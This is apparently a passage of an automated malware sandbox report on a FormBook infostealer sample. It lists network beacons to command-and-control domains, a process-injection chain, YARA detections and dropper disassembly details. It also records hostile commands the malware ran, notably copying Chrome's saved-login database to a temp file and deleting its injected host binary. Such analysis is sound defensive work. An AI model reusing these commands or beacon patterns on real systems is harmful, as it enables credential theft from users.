Feb 9, 2022 13:08:03.508497953 CET	10522	OUT	GET /q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u HTTP/1.1 Host: www.yokoi-tatami-lab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:03.825314045 CET	10522	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Feb 2022 12:08:03 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 341 Connection: close Location: https://www.yokoi-tatami-lab.com/q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u X-Powered-By: PleskLin Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 6b 6f 69 2d 74 61 74 61 6d 69 2d 6c 61 62 2e 63 6f 6d 2f 71 33 36 73 2f 3f 31 62 47 70 71 4e 3d 43 69 37 39 2b 6b 45 4a 77 34 54 43 71 37 79 4c 74 56 33 6b 39 6f 58 67 63 58 57 65 2b 63 37 42 78 72 45 4b 31 37 6d 77 69 65 47 49 70 74 45 51 4a 7a 61 2b 76 32 44 63 38 49 7a 31 6a 4f 56 53 57 69 73 63 26 61 6d 70 3b 56 72 3d 4d 42 5a 6c 39 5a 4d 58 6a 34 75 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.yokoi-tatami-lab.com/q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49831	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:13.982130051 CET	10523	OUT	GET /q36s/?1bGpqN=FgZmHunv013Q9EOx8OzeBGKV8sIXYwnIYQMpCCMzOG6h6X8t3t+l8o1J2BnYMBVPpIZA&Vr=MBZl9ZMXj4u HTTP/1.1 Host: www.okargo.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:14.018404007 CET	10524	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Wed, 09 Feb 2022 12:08:14 GMT content-type: text/html content-length: 138 location: http://www.okargo.pro x-iplb-request-id: 66818F3D:C2A7_D5BA2105:0050_6203AEAD_C0737A5:1C787 x-iplb-instance: 16980 set-cookie: SERVERID77446=200178\|YgOus\|YgOus; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49832	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:19.091783047 CET	10525	OUT	GET /q36s/?1bGpqN=Taj2aUXsQP+C4UcdcHZBeTyAvKtskpO/tWyZABwI4RRX1GdPLoNftssJ9pruDd6VDLGR&Vr=MBZl9ZMXj4u HTTP/1.1 Host: www.gestaltants.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:19.207209110 CET	10525	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 09 Feb 2022 12:08:19 GMT Content-Type: text/html Content-Length: 275 ETag: "61ffb800-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exePID: 4520, Parent PID: 5768

General

Target ID:	0
Start time:	13:05:03
Start date:	09/02/2022
Path:	C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe"
Imagebase:	0x7ff6eb140000
File size:	833536 bytes
MD5 hash:	BD0BB1E8DEDB72CDA230E34141E562E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: image.exePID: 7008, Parent PID: 4520

General

Target ID:	2
Start time:	13:05:04
Start date:	09/02/2022
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe
Imagebase:	0x950000
File size:	784384 bytes
MD5 hash:	8B7BDE45C8536482F67C812C461B806D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 44%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 5556, Parent PID: 7008

General

Target ID:	5
Start time:	13:05:09
Start date:	09/02/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x30000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3352, Parent PID: 5556

General

Target ID:	6
Start time:	13:05:12
Start date:	09/02/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5620, Parent PID: 3352

General

Target ID:	7
Start time:	13:05:16
Start date:	09/02/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff756df0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 3608, Parent PID: 3352

General

Target ID:	11
Start time:	13:05:45
Start date:	09/02/2022
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xee0000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3428, Parent PID: 3608

General

Target ID:	13
Start time:	13:05:49
Start date:	09/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5528, Parent PID: 3428

General

Target ID:	14
Start time:	13:05:50
Start date:	09/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6568, Parent PID: 3608

General

Target ID:	30
Start time:	13:08:47
Start date:	09/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: d6wtv4o01bbhxt.exePID: 1140, Parent PID: 3352

General

Target ID:	31
Start time:	13:08:47
Start date:	09/02/2022
Path:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
Imagebase:	0xe60000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1764, Parent PID: 6568

General

Target ID:	32
Start time:	13:08:48
Start date:	09/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6444, Parent PID: 1140

General

Target ID:	33
Start time:	13:08:48
Start date:	09/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: d6wtv4o01bbhxt.exePID: 4840, Parent PID: 3352

General

Target ID:	34
Start time:	13:08:52
Start date:	09/02/2022
Path:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"
Imagebase:	0x8a0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5132, Parent PID: 4840

General

Target ID:	36
Start time:	13:08:53
Start date:	09/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: d6wtv4o01bbhxt.exePID: 5876, Parent PID: 3352

General

Target ID:	38
Start time:	13:09:00
Start date:	09/02/2022
Path:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe"
Imagebase:	0x720000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3628, Parent PID: 5876

General

Target ID:	39
Start time:	13:09:02
Start date:	09/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exePID: 4520, Parent PID: 5768COMMON

Execution Graph

Execution Coverage:	28%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.6%
Total number of Nodes:	925
Total number of Limit Nodes:	43

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6EB1440C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6EB144154
CompareStringA.KERNEL32 ref: 00007FF6EB14421B

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

CompareStringA.KERNEL32 ref: 00007FF6EB144313
GetProcAddress.KERNEL32 ref: 00007FF6EB1443AF
FreeLibrary.KERNEL32 ref: 00007FF6EB144480
LocalFree.KERNEL32 ref: 00007FF6EB1444B0
FreeLibrary.KERNEL32 ref: 00007FF6EB1444D3
LocalFree.KERNEL32 ref: 00007FF6EB1444E2

Strings

wextract_cleanup0, xrefs: 00007FF6EB144636, 00007FF6EB1446F9
<None>, xrefs: 00007FF6EB1441FD, 00007FF6EB1442F5
DoInfInstall, xrefs: 00007FF6EB1443A5, 00007FF6EB144526
ADMQCMD, xrefs: 00007FF6EB1441D2
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB1443E6, 00007FF6EB1446B3
USRQCMD, xrefs: 00007FF6EB1441E3
advpack.dll, xrefs: 00007FF6EB144579
REBOOT, xrefs: 00007FF6EB144123
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6EB144605
POSTRUNPROGRAM, xrefs: 00007FF6EB1442D4
SHOWWINDOW, xrefs: 00007FF6EB144178
probe, xrefs: 00007FF6EB1443CE
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF6EB1446C9
RUNPROGRAM, xrefs: 00007FF6EB144244

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$probe$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 2679723528-255008641
Opcode ID: 7300005608385a1b52b29dcdb439213103942871383408aad98bb1ddde88b077
Instruction ID: ccd9b9ca17aa3d6a0f00bb8ff92d09146bb702f411830b29ca8087537ad1bc85
Opcode Fuzzy Hash: 7300005608385a1b52b29dcdb439213103942871383408aad98bb1ddde88b077
Instruction Fuzzy Hash: F6028F77A086428AEB208B14E8407F977A1FB8D7ACF540135DA4D836B4DF3EE546C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB141D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6EB141D6A
memset.MSVCRT ref: 00007FF6EB141D78
RegCreateKeyExA.KERNELBASE ref: 00007FF6EB141DBA

Part of subcall function 00007FF6EB14114C: _vsnprintf.MSVCRT ref: 00007FF6EB141189

RegQueryValueExA.KERNELBASE ref: 00007FF6EB141E0F
RegCloseKey.ADVAPI32 ref: 00007FF6EB141E2E
GetSystemDirectoryA.KERNEL32 ref: 00007FF6EB141E4C
LoadLibraryA.KERNELBASE ref: 00007FF6EB141E6E
GetProcAddress.KERNEL32 ref: 00007FF6EB141E90
FreeLibrary.KERNELBASE ref: 00007FF6EB141EA9
GetSystemDirectoryA.KERNEL32 ref: 00007FF6EB141EC5
LocalAlloc.KERNEL32 ref: 00007FF6EB141F21
GetModuleFileNameA.KERNEL32 ref: 00007FF6EB141F64
RegCloseKey.ADVAPI32 ref: 00007FF6EB141F7D
RegSetValueExA.KERNELBASE ref: 00007FF6EB141FED
RegCloseKey.KERNELBASE ref: 00007FF6EB141FFE
LocalFree.KERNEL32 ref: 00007FF6EB14200D

Strings

wextract_cleanup%d, xrefs: 00007FF6EB141DD6
wextract_cleanup0, xrefs: 00007FF6EB141DE2, 00007FF6EB141DFD, 00007FF6EB141FD2
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6EB141D8A
%s /D:%s, xrefs: 00007FF6EB141F99
DelNodeRunDLL32, xrefs: 00007FF6EB141E86
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF6EB141FAE
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB141EEC
advpack.dll, xrefs: 00007FF6EB141E58

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3765599613
Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
Instruction ID: db74f0b3cbfaefe1fef60b1b4601031c9d9225ecb69d581f77eef863c21d9891
